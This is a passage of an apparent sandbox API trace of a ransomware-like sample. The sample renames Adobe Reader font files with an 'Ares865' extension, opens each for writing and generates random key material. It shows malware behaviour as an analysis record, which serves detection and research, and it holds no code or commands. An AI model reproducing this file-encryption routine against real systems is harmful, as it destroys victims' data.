param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Italic.otf.Ares865") returned 83 [0160.806] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Italic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-italic.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Italic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-italic.otf.ares865"), dwFlags=0x1) returned 1 [0160.808] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Italic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-italic.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.808] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70584) returned 1 [0160.808] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.809] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.809] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.814] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.816] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeThai-Regular.otf" | out: lpString1="AdobeThai-Regular.otf") returned="AdobeThai-Regular.otf" [0160.816] lstrlenW (lpString="AdobeThai-Regular.otf") returned 21 [0160.816] lstrlenW (lpString="Ares865") returned 7 [0160.816] lstrcmpiW (lpString1="lar.otf", lpString2="Ares865") returned 1 [0160.816] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Regular.otf.Ares865") returned 84 [0160.816] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-regular.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-regular.otf.ares865"), dwFlags=0x1) returned 1 [0160.818] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-regular.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.818] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=66864) returned 1 [0160.818] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.819] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.819] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.828] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.828] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.829] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.830] lstrcpyW (in: lpString1=0x2cce46e, lpString2="CourierStd-Bold.otf" | out: lpString1="CourierStd-Bold.otf") returned="CourierStd-Bold.otf" [0160.830] lstrlenW (lpString="CourierStd-Bold.otf") returned 19 [0160.830] lstrlenW (lpString="Ares865") returned 7 [0160.830] lstrcmpiW (lpString1="old.otf", lpString2="Ares865") returned 1 [0160.830] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Bold.otf.Ares865") returned 82 [0160.830] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-bold.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-bold.otf.ares865"), dwFlags=0x1) returned 1 [0160.833] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-bold.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.833] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35740) returned 1 [0160.833] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.834] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.834] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.840] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.841] lstrcpyW (in: lpString1=0x2cce46e, lpString2="CourierStd-BoldOblique.otf" | out: lpString1="CourierStd-BoldOblique.otf") returned="CourierStd-BoldOblique.otf" [0160.841] lstrlenW (lpString="CourierStd-BoldOblique.otf") returned 26 [0160.841] lstrlenW (lpString="Ares865") returned 7 [0160.841] lstrcmpiW (lpString1="que.otf", lpString2="Ares865") returned 1 [0160.842] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-BoldOblique.otf.Ares865") returned 89 [0160.842] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-BoldOblique.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-boldoblique.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-BoldOblique.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-boldoblique.otf.ares865"), dwFlags=0x1) returned 1 [0160.843] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-BoldOblique.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-boldoblique.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.844] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37084) returned 1 [0160.844] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.850] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.851] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.851] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.852] lstrcpyW (in: lpString1=0x2cce46e, lpString2="CourierStd-Oblique.otf" | out: lpString1="CourierStd-Oblique.otf") returned="CourierStd-Oblique.otf" [0160.852] lstrlenW (lpString="CourierStd-Oblique.otf") returned 22 [0160.852] lstrlenW (lpString="Ares865") returned 7 [0160.852] lstrcmpiW (lpString1="que.otf", lpString2="Ares865") returned 1 [0160.852] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Oblique.otf.Ares865") returned 85 [0160.853] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Oblique.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-oblique.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Oblique.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-oblique.otf.ares865"), dwFlags=0x1) returned 1 [0160.854] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Oblique.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-oblique.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.854] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37432) returned 1 [0160.855] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.855] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.855] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.859] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.860] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.860] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.861] lstrcpyW (in: lpString1=0x2cce46e, lpString2="CourierStd.otf" | out: lpString1="CourierStd.otf") returned="CourierStd.otf" [0160.861] lstrlenW (lpString="CourierStd.otf") returned 14 [0160.861] lstrlenW (lpString="Ares865") returned 7 [0160.861] lstrcmpiW (lpString1="Std.otf", lpString2="Ares865") returned 1 [0160.861] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd.otf.Ares865") returned 77 [0160.861] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd.otf.ares865"), dwFlags=0x1) returned 1 [0160.863] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35980) returned 1 [0160.864] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.864] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.864] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.870] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.870] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.870] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.871] lstrcpyW (in: lpString1=0x2cce46e, lpString2="MinionPro-Bold.otf" | out: lpString1="MinionPro-Bold.otf") returned="MinionPro-Bold.otf" [0160.871] lstrlenW (lpString="MinionPro-Bold.otf") returned 18 [0160.871] lstrlenW (lpString="Ares865") returned 7 [0160.872] lstrcmpiW (lpString1="old.otf", lpString2="Ares865") returned 1 [0160.872] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Bold.otf.Ares865") returned 81 [0160.872] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-bold.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-bold.otf.ares865"), dwFlags=0x1) returned 1 [0160.877] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-bold.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.878] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=230912) returned 1 [0160.878] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.879] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.879] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.894] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.894] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.894] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.898] lstrcpyW (in: lpString1=0x2cce46e, lpString2="MinionPro-BoldIt.otf" | out: lpString1="MinionPro-BoldIt.otf") returned="MinionPro-BoldIt.otf" [0160.898] lstrlenW (lpString="MinionPro-BoldIt.otf") returned 20 [0160.898] lstrlenW (lpString="Ares865") returned 7 [0160.898] lstrcmpiW (lpString1="dIt.otf", lpString2="Ares865") returned 1 [0160.898] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-BoldIt.otf.Ares865") returned 83 [0160.898] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-BoldIt.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-boldit.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-BoldIt.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-boldit.otf.ares865"), dwFlags=0x1) returned 1 [0160.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-BoldIt.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-boldit.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.901] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=276632) returned 1 [0160.901] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.902] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.902] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.919] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.920] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.920] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.924] lstrcpyW (in: lpString1=0x2cce46e, lpString2="MinionPro-It.otf" | out: lpString1="MinionPro-It.otf") returned="MinionPro-It.otf" [0160.924] lstrlenW (lpString="MinionPro-It.otf") returned 16 [0160.924] lstrlenW (lpString="Ares865") returned 7 [0160.924] lstrcmpiW (lpString1="-It.otf", lpString2="Ares865") returned 1 [0160.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-It.otf.Ares865") returned 79 [0160.924] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-It.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-it.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-It.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-it.otf.ares865"), dwFlags=0x1) returned 1 [0160.926] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-It.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-it.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.926] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=276140) returned 1 [0160.927] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.927] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.927] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.947] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.951] lstrcpyW (in: lpString1=0x2cce46e, lpString2="MinionPro-Regular.otf" | out: lpString1="MinionPro-Regular.otf") returned="MinionPro-Regular.otf" [0160.951] lstrlenW (lpString="MinionPro-Regular.otf") returned 21 [0160.951] lstrlenW (lpString="Ares865") returned 7 [0160.951] lstrcmpiW (lpString1="lar.otf", lpString2="Ares865") returned 1 [0160.951] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf.Ares865") returned 84 [0160.952] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf.ares865"), dwFlags=0x1) returned 1 [0160.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.953] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=231312) returned 1 [0160.954] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.954] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.954] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.968] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.969] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.969] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.972] lstrcpyW (in: lpString1=0x2cce46e, lpString2="MyriadPro-Bold.otf" | out: lpString1="MyriadPro-Bold.otf") returned="MyriadPro-Bold.otf" [0160.973] lstrlenW (lpString="MyriadPro-Bold.otf") returned 18 [0160.973] lstrlenW (lpString="Ares865") returned 7 [0160.973] lstrcmpiW (lpString1="old.otf", lpString2="Ares865") returned 1 [0160.973] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf.Ares865") returned 81 [0160.973] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf.ares865"), dwFlags=0x1) returned 1 [0160.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.975] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=95684) returned 1 [0160.975] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.976] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.976] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.988] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.989] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.989] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.991] lstrcpyW (in: lpString1=0x2cce46e, lpString2="MyriadPro-BoldIt.otf" | out: lpString1="MyriadPro-BoldIt.otf") returned="MyriadPro-BoldIt.otf" [0160.991] lstrlenW (lpString="MyriadPro-BoldIt.otf") returned 20 [0160.991] lstrlenW (lpString="Ares865") returned 7 [0160.991] lstrcmpiW (lpString1="dIt.otf", lpString2="Ares865") returned 1 [0160.991] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf.Ares865") returned 83 [0160.991] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf.ares865"), dwFlags=0x1) returned 1 [0160.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.994] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=100252) returned 1 [0160.995] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.995] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.995] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.001] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 